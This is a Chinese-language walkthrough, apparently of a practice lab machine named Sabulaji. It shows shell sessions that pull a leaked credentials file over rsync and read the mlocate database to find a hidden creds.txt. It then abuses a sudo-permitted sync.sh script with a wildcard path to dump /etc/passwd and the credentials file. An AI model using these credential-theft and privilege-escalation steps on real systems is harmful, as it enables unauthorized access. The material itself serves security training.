\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ sshpass -p "admin123" rsync -av rsync:\/\/sabulaji@192.168.10.107:873\/epages\/ 2>\/dev\/null \n\nreceiving incremental file list\ndrwxr-xr-x 4,096 2025\/05\/15 12:17:03 .\n-rw-r--r-- 13,312 2025\/05\/15 12:17:03 secrets.doc\n\nsent 20 bytes received 73 bytes 186.00 bytes\/sec\ntotal size is 13,312 speedup is 143.14\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ sshpass -p "admin123" rsync -av rsync:\/\/sabulaji@192.168.10.107:873\/epages\/secrets.doc secrets.doc 2>\/dev\/null\n\nreceiving incremental file list\nsecrets.doc\n\nsent 43 bytes received 13,410 bytes 8,968.67 bytes\/sec\ntotal size is 13,312 speedup is 0.99<\/code><\/pre>\n\u6253\u5f00\u53d1\u73b0\uff1a<\/p>\n
<\/div><\/p>\n\u63d0\u5230\u4e86\u82e5\u53e3\u4ee4\uff1awelcome:P@ssw0rd123!<\/code>\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nwelcome@Sabulaji:~$ whoami;id\nwelcome\nuid=1000(welcome) gid=1000(welcome) groups=1000(welcome),123(mlocate)\nwelcome@Sabulaji:~$ sudo -l\nMatching Defaults entries for welcome on Sabulaji:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser welcome may run the following commands on Sabulaji:\n (sabulaji) NOPASSWD: \/opt\/sync.sh\nwelcome@Sabulaji:~$ cat \/opt\/sync.sh\n#!\/bin\/bash\n\nif [ -z $1 ]; then\n echo "error: note missing"\n exit\nfi\n\nnote=$1\n\nif [[ "$note" == *"sabulaji"* ]]; then\n echo "error: forbidden"\n exit\nfi\n\ndifference=$(diff \/home\/sabulaji\/personal\/notes.txt $note)\n\nif [ -z "$difference" ]; then\n echo "no update"\n exit\nfi\n\necho "Difference: $difference"\n\ncp $note \/home\/sabulaji\/personal\/notes.txt\n\necho "[+] Updated."<\/code><\/pre>\n\u8bfb\u53d6mlocate.db\u5229\u7528\u811a\u672c\u8bfb\u53d6\u6587\u4ef6<\/h3>\n
\u6ce8\u610f\u5230\u7528\u6237\u591a\u4e86\u4e00\u4e2a\u6743\u9650123(mlocate)<\/code>\uff0c\u770b\u4e00\u4e0b\u662f\u4e2a\u5565\uff1a<\/p>\n\n\ud83d\udd10 1. mlocate.db<\/code> \u6570\u636e\u5e93\u7684\u6743\u9650\u8bbe\u7f6e<\/strong><\/h3>\n\n- \n
\u6587\u4ef6\u6743\u9650mlocate.db<\/code><\/p>\n\u9ed8\u8ba4\u4f4d\u4e8e\/var\/lib\/mlocate\/<\/code>\uff0c\u6743\u9650\u4e3a640\uff08-rw-r-----\uff09<\/strong><\/p>\n\n- \u5c5e\u4e3b<\/strong>\uff1a
root<\/code>\uff08\u62e5\u6709\u8bfb\u5199\u6743\u9650\uff09\u3002<\/li>\n- \u5c5e\u7ec4<\/strong>\uff1a
mlocate<\/code> \u6216 slocate<\/code>\uff08\u62e5\u6709\u53ea\u8bfb\u6743\u9650\uff09\u3002<\/li>\n- \u5176\u4ed6\u7528\u6237<\/strong>\uff1a\u65e0\u6743\u9650\uff08\u65e0\u6cd5\u76f4\u63a5\u8bfb\u53d6\u6570\u636e\u5e93\uff09\u3002<\/li>\n<\/ul>\n
$ ls -l \/var\/lib\/mlocate\/mlocate.db\n-rw-r----- 1 root mlocate 1838850 Jan 20 04:29 mlocate.db<\/code><\/pre>\n<\/li>\n<\/ul>\n
\n\u2699\ufe0f 2. locate<\/code> \u547d\u4ee4\u7684 SGID \u6743\u9650<\/strong><\/h3>\n\n- \n
SGID \u4f5c\u7528\uff1a\u5f53\u666e\u901a\u7528\u6237\u6267\u884clocate<\/code><\/p>\n\u65f6\uff0c\u8fdb\u7a0b\u4f1a\u4e34\u65f6\u4ee5 mlocate\u7ec4\u8eab\u4efd<\/strong>\u8fd0\u884c\uff08\u800c\u975e\u7528\u6237\u539f\u5c5e\u7ec4\uff09<\/p>\n$ ls -l \/usr\/bin\/locate\nlrwxrwxrwx 1 root root 24 \/usr\/bin\/locate -> \/etc\/alternatives\/locate\n$ ls -l \/usr\/bin\/mlocate\n-rwxr-sr-x 1 root mlocate 34452 \/usr\/bin\/mlocate # SGID \u4f4d\uff08r-s \u4e2d\u7684 's'\uff09<\/code><\/pre>\n<\/li>\n- \n
\u6743\u9650\u7ee7\u627f<\/strong>\uff1a\u56e0 mlocate<\/code> \u7ec4\u5bf9\u6570\u636e\u5e93\u6709\u8bfb\u6743\u9650\uff08r--<\/code>\uff09\uff0c\u7528\u6237\u901a\u8fc7\u547d\u4ee4\u95f4\u63a5\u83b7\u5f97\u8bbf\u95ee\u6743\u3002<\/p>\n<\/li>\n<\/ul>\n<\/blockquote>\n\u5c1d\u8bd5\u5b9a\u4f4d\u4e00\u4e0b\u4e0a\u8ff0\u811a\u672c\u7684\u7981\u6b62\u5b57\u7b26\uff1a<\/p>\n
welcome@Sabulaji:~$ locate *sabulaji*\n\/home\/sabulaji\n\/home\/sabulaji\/.bash_history\n\/home\/sabulaji\/.bash_logout\n\/home\/sabulaji\/.bashrc\n\/home\/sabulaji\/.profile\n\/home\/sabulaji\/personal\nwelcome@Sabulaji:~$ cat \/var\/lib\/mlocate\/mlocate.db | grep abulaji\nBinary file (standard input) matches\nwelcome@Sabulaji:~$ hexdump -C \/var\/lib\/mlocate\/mlocate.db | grep -i sabulaji\n00008cb0 00 2f 68 6f 6d 65 2f 73 61 62 75 6c 61 6a 69 00 |.\/home\/sabulaji.|\n00008d10 2f 73 61 62 75 6c 61 6a 69 2f 70 65 72 73 6f 6e |\/sabulaji\/person|\nwelcome@Sabulaji:~$ strings \/var\/lib\/mlocate\/mlocate.db | grep -i sabulaji\nsabulaji\n\/home\/sabulaji\n\/home\/sabulaji\/personal\nwelcome@Sabulaji:\/tmp$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\nsshd\nwelcome\nsabulaji\nwelcome@Sabulaji:\/tmp$ ls -la \/home\/\ntotal 16\ndrwxr-xr-x 4 root root 4096 May 15 12:39 .\ndrwxr-xr-x 18 root root 4096 Mar 18 20:37 ..\ndrwxr-xr-x 3 sabulaji sabulaji 4096 May 16 01:22 sabulaji\ndrwxr-xr-x 2 welcome welcome 4096 May 16 01:21 welcome\nwelcome@Sabulaji:\/tmp$ cat -n log | grep laji\n 2070 sabulaji\n 2072 \/home\/sabulaji\n 2078 \/home\/sabulaji\/personal\nwelcome@Sabulaji:\/tmp$ sed -n '2070,2100p' log > log1\nwelcome@Sabulaji:\/tmp$ cat log1\nsabulaji\nwelcome\n\/home\/sabulaji\n.bash_history\n.bash_logout\n.bashrc\n.profile\npersonal\n\/home\/sabulaji\/personal\ncreds.txt\nnotes.txt\n\/home\/welcome\n.bash_history\n.bash_logout\n.bashrc\n.profile\nuser.txt\n\/lost+found\n\/mnt\n\/opt\nsync.sh\n\/root\n.Xauthority\n.bash_history\n.bashrc\n.cache\n.gnupg\n.local\n.profile\n.ssh\n.viminfo<\/code><\/pre>\n\u627e\u5230\u4e86\u4e00\u4e2acreds.txt<\/code>\uff0c\u5c1d\u8bd5\u4f7f\u7528\u811a\u672c\u8fdb\u884c\u8bfb\u53d6\uff1a<\/p>\n\u8fd9\u662f\u4e00\u4e2a\u66f4\u65b0\u811a\u672c\uff0cnote.txt<\/code>\u7528\u4e8e\u4e34\u65f6\u5b58\u50a8\u7684\u4f5c\u7528\uff0c\u9700\u8981\u4e0d\u51fa\u73b0sabulaji<\/code>\u8fd9\u4e2a\u5173\u952e\u5b57\uff1a<\/p>\nwelcome@Sabulaji:\/tmp$ sudo -u sabulaji \/opt\/sync.sh \/etc\/passwd\nDifference: 1c1,27\n< Maybe you can find it...\n---\n> root:x:0:0:root:\/root:\/bin\/bash\n> daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\n> bin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\n> sys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\n> sync:x:4:65534:sync:\/bin:\/bin\/sync\n> games:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\n> man:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\n> lp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\n> mail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\n> news:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\n> uucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\n> proxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\n> www-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\n> backup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\n> list:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\n> irc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\n> gnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\n> nobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n> _apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\n> systemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\n> systemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\n> systemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\n> systemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\n> messagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\n> sshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\n> welcome:x:1000:1000:,,,:\/home\/welcome:\/bin\/bash\n> sabulaji:x:1001:1001::\/home\/sabulaji:\/bin\/bash\n[+] Updated.\nwelcome@Sabulaji:\/tmp$ sudo -u sabulaji \/opt\/sync.sh \/home\/sabulaji\/personal\/cred.txt\nerror: forbidden\nwelcome@Sabulaji:\/tmp$ sudo -u sabulaji \/opt\/sync.sh \/home\/*laji\/personal\/cred.txt\ndiff: \/home\/*laji\/personal\/cred.txt: No such file or directory\nno update<\/code><\/pre>\n\u4e00\u76f4\u6ca1\u6210\u529f\uff0c\u7136\u540e\u53d1\u73b0\u662f\u6587\u4ef6\u540d\u5199\u9519\u4e86\u3002\u3002\u3002\u3002<\/p>\n
welcome@Sabulaji:\/tmp$ sudo -u sabulaji \/opt\/sync.sh \/home\/*laji\/personal\/creds.txt\nDifference: 1,27c1\n< root:x:0:0:root:\/root:\/bin\/bash\n< daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\n< bin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\n< sys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\n< sync:x:4:65534:sync:\/bin:\/bin\/sync\n< games:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\n< man:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\n< lp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\n< mail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\n< news:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\n< uucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\n< proxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\n< www-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\n< backup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\n< list:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\n< irc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\n< gnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\n< nobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n< _apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\n< systemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\n< systemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\n< systemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\n< systemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\n< messagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\n< sshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\n< welcome:x:1000:1000:,,,:\/home\/welcome:\/bin\/bash\n< sabulaji:x:1001:1001::\/home\/sabulaji:\/bin\/bash\n---\n> Sensitive Credentials:Z2FzcGFyaW4=\n[+] Updated.\n\nwelcome@Sabulaji:\/tmp$ echo "Z2FzcGFyaW4=" | base64 -d\ngasparin<\/code><\/pre>\n\u4f7f\u7528\u51ed\u8bc1sabulaji:Z2FzcGFyaW4=<\/code>\u5b8c\u6210\u767b\u5f55\uff01<\/p>\n<\/div><\/p>\nrsync\u63d0\u6743<\/h3>\nsabulaji@Sabulaji:\/tmp$ sudo -l\nMatching Defaults entries for sabulaji on Sabulaji:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser sabulaji may run the following commands on Sabulaji:\n (ALL) NOPASSWD: \/usr\/bin\/rsync<\/code><\/pre>\n
![\"image-20250611151233160\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121323629.png\")
<\/div><\/p>\n![\"image-20250611152419759\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121323631.png\")
<\/div><\/p>\n![\"image-20250612002902662\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121323632.png\")
<\/div><\/p>\n![\"image-20250612124657233\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121323633.png\")
<\/div><\/p>\n![\"image-20250612132057816\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121323634.png\")
<\/div><\/p>\n![\"image-20250612132232265\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121323635.png\")
<\/div><\/p>\n